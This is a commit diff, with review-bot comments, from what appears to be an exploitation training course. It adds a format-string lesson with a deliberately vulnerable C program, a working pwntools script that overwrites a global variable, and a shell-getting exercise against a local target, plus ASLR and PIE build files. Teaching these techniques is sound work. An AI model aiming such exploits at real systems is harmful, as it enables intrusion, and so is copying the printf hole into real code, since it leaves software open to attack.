
Commit 7fc3931

committed
Finished!
1 parent f70fbae commit 7fc3931

16 files changed, +368 -3 lines changed

lessons/10_bypass_got/lessonplan.md

Lines changed: 2 additions & 1 deletion
@@ -385,7 +385,8 @@ It was compiled with a stack canary.
385385
386386
`gcc -m32 -znoexecstack -o ./build/2_event1 ./src/2_event1.c`
387387
388-
The binary can be [found here][1] and the source can be [found here][2].
388+
The binary can be [found here][1] and the source can be [found here][2]. The
389+
remote target is `nc localhost 1902`.
389390
390391
[1]: ./build/2_event1
391392
[2]: ./src/2_event1.c
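Review bot: the unchanged context line just above this addition says the binary "was compiled with a stack canary", but the quoted build command `gcc -m32 -znoexecstack -o ./build/2_event1 ./src/2_event1.c` never passes `-fstack-protector`; the canary is only there because Ubuntu's gcc turns on `-fstack-protector-strong` by default, so readers on another toolchain will build a canary-less binary and the lesson text will be wrong for them. Pass the flag explicitly (in the lesson plan and in the lesson's Makefile) so the statement holds everywhere. The added `nc localhost 1902` sentence itself is fine and follows the one-port-per-lesson scheme used by 13_fmt_str (`nc localhost 1903`).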

lessons/13_fmt_str/Makefile

Lines changed: 4 additions & 1 deletion
@@ -1,4 +1,7 @@
1-
all: 3_echo
1+
all: 2_overwrite 3_echo
2+
3+
2_overwrite:
4+
gcc -m32 -o ./build/2_overwrite ./src/2_overwrite.c
25

36
3_echo:
47
gcc -m32 -znoexecstack -o ./build/3_echo ./src/3_echo.c
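Review bot: the new `2_overwrite` rule drops `-znoexecstack` while the existing `3_echo` rule keeps it; if the difference is deliberate (the lesson only needs a format-string write, so stack executability is irrelevant) a short comment saying so would stop readers wondering, otherwise add the flag for consistency. Separately, this commit also checks in `build/1_lottery` and `src/1_lottery.c`, yet there is no `1_lottery` target here and `all:` lists only `2_overwrite 3_echo`, so `make` can never rebuild that binary. Finally, the lesson resolves `token` to the fixed address `0x0804a028` with `nm`, which depends on the toolchain defaulting to a non-PIE 32-bit executable; worth noting in the Makefile (or pinning with the appropriate no-PIE flag where the compiler supports it) so the hard-coded address in the lesson keeps matching the build.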

lessons/13_fmt_str/build/1_lottery

7.14 KB
Binary file not shown.

lessons/13_fmt_str/build/2_overwrite

7.33 KB
Binary file not shown.

lessons/13_fmt_str/lessonplan.md

Lines changed: 115 additions & 0 deletions
@@ -1 +1,116 @@
11
# Format String Vulnerabilties
2+
3+
Yes, I know this is a really cliche topic but I am just covering one cool thing
4+
that you can do with pwntools. That's all, I promise. Now, we will be looking at
5+
this simple program that is vulnerable to a format string attack. The idea is to
6+
modify the token so that it contains 0xcafebabe when the check occurs.
7+
8+
```c
9+
#include <stdio.h>
10+
#include <stdlib.h>
11+
12+
unsigned int token = 0xdeadbeef;
13+
14+
int main() {
15+
char buffer[200];
16+
scanf("%199s", buffer);
17+
printf(buffer);
18+
printf("\nToken = 0x%x\n", token);
19+
if (token == 0xcafebabe) {
20+
puts("Winner!");
21+
}
22+
else {
23+
puts("Loser!");
24+
}
25+
}
26+
```
27+
28+
So after playing around with the program, we figure out that the first format
29+
argument we control is at offset 5.
30+
31+
```shell
32+
ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ ../build/2_overwrite
33+
AAAA%5$x
34+
AAAA41414141
35+
Token = 0xdeadbeef
36+
Loser!
37+
```
38+
39+
Next, we need the address of the token.
40+
41+
```shell
42+
ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ nm ../build/2_overwrite | grep token
43+
0804a028 D token
44+
```
45+
46+
Now we can write our exploit script. Pwntools actually has a format string
47+
attack generator so we can beat the binary in a few quick easy lines.
48+
49+
```python
50+
#!/usr/bin/python
51+
52+
from pwn import *
53+
54+
token_addr = 0x0804a028
55+
56+
def main():
57+
p = process("../build/2_overwrite")
58+
payload = fmtstr_payload(5, {token_addr: 0xcafebabe})
59+
log.info("Sending payload: %s" % payload)
60+
p.sendline(payload)
61+
62+
data = p.recvall()
63+
realdata = data[data.find("Token"):]
64+
log.success(realdata)
65+
66+
if __name__ == "__main__":
67+
main()
68+
```
69+
70+
Running the program.
71+
72+
```shell
73+
ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ python 1_overwrite_token.py
74+
[+] Starting local process '../build/2_overwrite': Done
75+
[*] Sending payload: (�)�*�+�%174c%5$hhn%252c%6$hhn%68c%7$hhn%204c%8$hhn
76+
[▁] Receiving all data: 0B
77+
[+] Receiving all data: Done (742B)
78+
[+] Token = 0xcafebabe
79+
Winner!
80+
```
81+
82+
## Exercises
83+
84+
### Ex 13.1: Echoes
85+
86+
Before you continue onto the more advanced exercises, here's something to
87+
tackle. The source code to this challenge is given:
88+
89+
```c
90+
#include <stdlib.h>
91+
#include <stdio.h>
92+
#include <unistd.h>
93+
94+
int main() {
95+
setvbuf(stdin, NULL, _IONBF, 0);
96+
setvbuf(stdout, NULL, _IONBF, 0);
97+
char echoed[1000] = {0};
98+
char number[200];
99+
int times;
100+
int i;
101+
while (1) {
102+
read(0, echoed, 999);
103+
puts("How many times do you want it echoed?");
104+
scanf("%199s", number);
105+
times = atoi(number);
106+
for (i = 0; i < times; i++) {
107+
printf(echoed);
108+
}
109+
}
110+
}
111+
```
112+
113+
The binary to the exercise can be found [here][1]. The remote target is `nc
114+
localhost 1903` and the goal is to get a shell.
115+
116+
[1]: ./build/3_echo
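Review bot: the exploit script in this lesson only runs under Python 2: on Python 3 pwntools `p.recvall()` returns `bytes`, so `data.find("Token")` raises `TypeError`, and `"Sending payload: %s" % payload` prints the `b'...'` repr rather than the raw bytes. Use `data.find(b"Token")` (and `log.success(realdata.decode())`) so the script works on both, since `#!/usr/bin/python` resolves to Python 3 on current systems. Two smaller points in the same hunk: the unchanged heading still misspells "Vulnerabilities" as "Vulnerabilties", and the "we figure out that the first format argument we control is at offset 5" sentence would read better with the one-line method (`AAAA%1$x`, `%2$x`, ... until `41414141` appears), since the transcript only shows the confirming `AAAA%5$x` run.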
Lines changed: 18 additions & 0 deletions
@@ -0,0 +1,18 @@
1+
#!/usr/bin/python
2+
3+
from pwn import *
4+
5+
token_addr = 0x0804a028
6+
7+
def main():
8+
p = process("../build/2_overwrite")
9+
payload = fmtstr_payload(5, {token_addr: 0xcafebabe})
10+
log.info("Sending payload: %s" % payload)
11+
p.sendline(payload)
12+
13+
data = p.recvall()
14+
realdata = data[data.find("Token"):]
15+
log.success(realdata)
16+
17+
if __name__ == "__main__":
18+
main()
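Review bot: `token_addr = 0x0804a028` is hard-coded and will silently go stale the moment `2_overwrite` is rebuilt with different flags or a different toolchain, at which point the `%hhn` writes land on whatever now sits at that address. Resolve it from the binary instead, e.g. `elf = ELF("../build/2_overwrite")` followed by `token_addr = elf.symbols["token"]`, which also shows readers where the `nm` value in the lesson came from. The `data.find("Token")` call is also Python 2 only; `data.find(b"Token")` works under both interpreters.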

lessons/13_fmt_str/src/1_lottery.c

Lines changed: 7 additions & 0 deletions
@@ -0,0 +1,7 @@
1+
#include <stdio.h>
2+
#include <stdlib.h>
3+
4+
5+
int main() {
6+
7+
}
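Review bot: `main` here is an empty body, yet the same commit checks in a compiled `build/1_lottery` (7.14 KB) and nothing else in the commit (the 13_fmt_str Makefile, the lesson plan) references a lottery exercise. Either the source for that exercise is missing from this commit or the binary should not be committed until it exists; as it stands `make` cannot reproduce `build/1_lottery`. The two `#include` lines are unused in an empty program.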

lessons/13_fmt_str/src/2_overwrite.c

Lines changed: 17 additions & 0 deletions
@@ -0,0 +1,17 @@
1+
#include <stdio.h>
2+
#include <stdlib.h>
3+
4+
unsigned int token = 0xdeadbeef;
5+
6+
int main() {
7+
char buffer[200];
8+
scanf("%199s", buffer);
9+
printf(buffer);
10+
printf("\nToken = 0x%x\n", token);
11+
if (token == 0xcafebabe) {
12+
puts("Winner!");
13+
}
14+
else {
15+
puts("Loser!");
16+
}
17+
}
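Review bot: `scanf("%199s", buffer)` stops at the first whitespace byte, so a `fmtstr_payload` whose leading target addresses or padding contain 0x09-0x0d or 0x20 is truncated before any `%hhn` directive is reached and the write never happens. The addresses `0x0804a028`-`0x0804a02b` used in the lesson contain no such byte, which is the only reason the worked exploit succeeds; that constraint deserves a sentence in the lesson plan, or the input could be switched to `read()` as `3_echo` already does. `printf(buffer)` is the intended bug and gcc's `-Wformat-security` will flag it, which is fine for a deliberately vulnerable target, but `main` should still `return 0;` to keep the source warning-free otherwise.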

lessons/8_aslr/Makefile

Lines changed: 7 additions & 0 deletions
@@ -0,0 +1,7 @@
1+
all: 1_reveal_addresses
2+
3+
1_reveal_addresses:
4+
gcc -m32 -o ./build/1_reveal_addresses ./src/1_reveal_addresses.c -ldl
5+
gcc -o ./build/2_reveal_addresses64 ./src/1_reveal_addresses.c -ldl
6+
gcc -m32 -o ./build/3_reveal_addresses_pie ./src/1_reveal_addresses.c -ldl -pie
7+
gcc -o ./build/4_reveal_addresses64_pie ./src/1_reveal_addresses.c -ldl -pie -fPIC
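Review bot: the `3_reveal_addresses_pie` line passes `-pie` to the linker without `-fPIE`/`-fPIC` on the compile side, unlike the `4_reveal_addresses64_pie` line which passes `-pie -fPIC`; the 32-bit objects are therefore compiled with absolute addressing and the link either relies on text relocations or fails outright depending on the toolchain, which undercuts a lesson whose point is position-independent code. Add `-fPIC` (or `-fPIE`) to the 32-bit PIE build to match. Also, the single `1_reveal_addresses` rule produces four binaries from one source, so `all:` covers them only by accident and `make 2_reveal_addresses64` is not a target; either split it into four rules or name the rule for what it builds.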
7.4 KB
Binary file not shown.
